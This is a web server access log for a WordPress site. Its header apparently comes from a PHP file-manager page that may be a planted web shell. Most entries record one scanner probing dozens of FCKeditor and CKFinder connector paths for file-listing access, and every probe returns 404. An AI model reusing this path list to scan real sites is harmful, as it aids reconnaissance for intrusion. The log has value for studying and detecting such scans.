HEX
Server: nginx/1.16.1
System: Linux ecs-04358622 4.19.90-2107.6.0.0100.oe1.bclinux.x86_64 #1 SMP Wed Dec 1 19:59:44 CST 2021 x86_64
User: nginx (994)
PHP: 8.0.0
Disabled: NONE
Upload Files
File: /home/logs/cqqizhou_access_2025-10-28.log
36.133.115.36 - - [28/Oct/2025:00:00:31 +0800] "POST /wp-cron.php?doing_wp_cron=1761580831.2733519077301025390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.155.26.193 - - [28/Oct/2025:00:00:31 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.155.26.193 - - [28/Oct/2025:00:00:33 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [28/Oct/2025:00:14:27 +0800] "POST /wp-cron.php?doing_wp_cron=1761581666.9718179702758789062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.100.35 - - [28/Oct/2025:00:14:27 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000 HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
124.236.77.12 - - [28/Oct/2025:00:35:35 +0800] "GET /fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:35 +0800] "GET /admin/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:35 +0800] "GET /js/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:35 +0800] "GET /editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:35 +0800] "GET /editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:35 +0800] "GET /includes/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:35 +0800] "GET /includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:35 +0800] "GET /include/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:35 +0800] "GET /inc/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:35 +0800] "GET /scripts/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /content/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /common/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /manage/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /manager/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /editor/ckfinder/core/connector/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /ckeditor/ckfinder/core/connector/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /neteditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /ckfinder/core/connector/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /apps/ckfinder/core/connector/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /_libs/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /common/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:36 +0800] "GET /nsw.fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:37 +0800] "GET /nsw.fckeditordoc/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:37 +0800] "GET /oa/ckeditor/ckfinder/core/connector/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:37 +0800] "GET /oa/ckfinder/core/connector/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:37 +0800] "GET /js/ckfinder/core/connector/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:37 +0800] "GET /resource/base/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:37 +0800] "GET /bjmanage/mylfck/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:37 +0800] "GET /english/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:37 +0800] "GET /sitefiles/bairong/texteditor/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:38 +0800] "GET /old/ckfinder/core/connector/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:38 +0800] "GET /old/suppot/fckedit/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:38 +0800] "GET /suppot/fckedit/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:38 +0800] "GET /master/ckfinder/core/connector/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:38 +0800] "GET /sandfckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:38 +0800] "GET /oldbackup/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:39 +0800] "GET /bak/ckfinder/core/connector/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:39 +0800] "GET /sdws.fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:39 +0800] "GET /netcms.web/editor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:39 +0800] "GET /editor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
36.133.115.36 - - [28/Oct/2025:00:35:39 +0800] "POST /wp-cron.php?doing_wp_cron=1761582939.8640239238739013671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
124.236.77.12 - - [28/Oct/2025:00:35:39 +0800] "GET /fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:41 +0800] "GET /admin/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
36.133.115.36 - - [28/Oct/2025:00:35:49 +0800] "POST /wp-cron.php?doing_wp_cron=1761582949.6792171001434326171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
124.236.77.12 - - [28/Oct/2025:00:35:49 +0800] "GET /js/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:50 +0800] "GET /editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:51 +0800] "GET /editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:51 +0800] "GET /includes/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:52 +0800] "GET /includes/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:53 +0800] "GET /include/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:53 +0800] "GET /inc/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:54 +0800] "GET /scripts/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:55 +0800] "GET /content/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:55 +0800] "GET /common/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:56 +0800] "GET /admin/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:57 +0800] "GET /manage/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:57 +0800] "GET /manager/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:58 +0800] "GET /editor/ckfinder/core/connector/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:35:59 +0800] "GET /ckeditor/ckfinder/core/connector/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:00 +0800] "GET /neteditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:00 +0800] "GET /ckfinder/core/connector/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:01 +0800] "GET /apps/ckfinder/core/connector/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:02 +0800] "GET /_libs/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:02 +0800] "GET /common/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:03 +0800] "GET /nsw.fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:04 +0800] "GET /nsw.fckeditordoc/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:05 +0800] "GET /oa/ckeditor/ckfinder/core/connector/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:05 +0800] "GET /oa/ckfinder/core/connector/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:06 +0800] "GET /js/ckfinder/core/connector/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:07 +0800] "GET /resource/base/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:07 +0800] "GET /bjmanage/mylfck/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:08 +0800] "GET /english/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:09 +0800] "GET /sitefiles/bairong/texteditor/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:09 +0800] "GET /old/ckfinder/core/connector/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:10 +0800] "GET /old/suppot/fckedit/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:11 +0800] "GET /suppot/fckedit/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
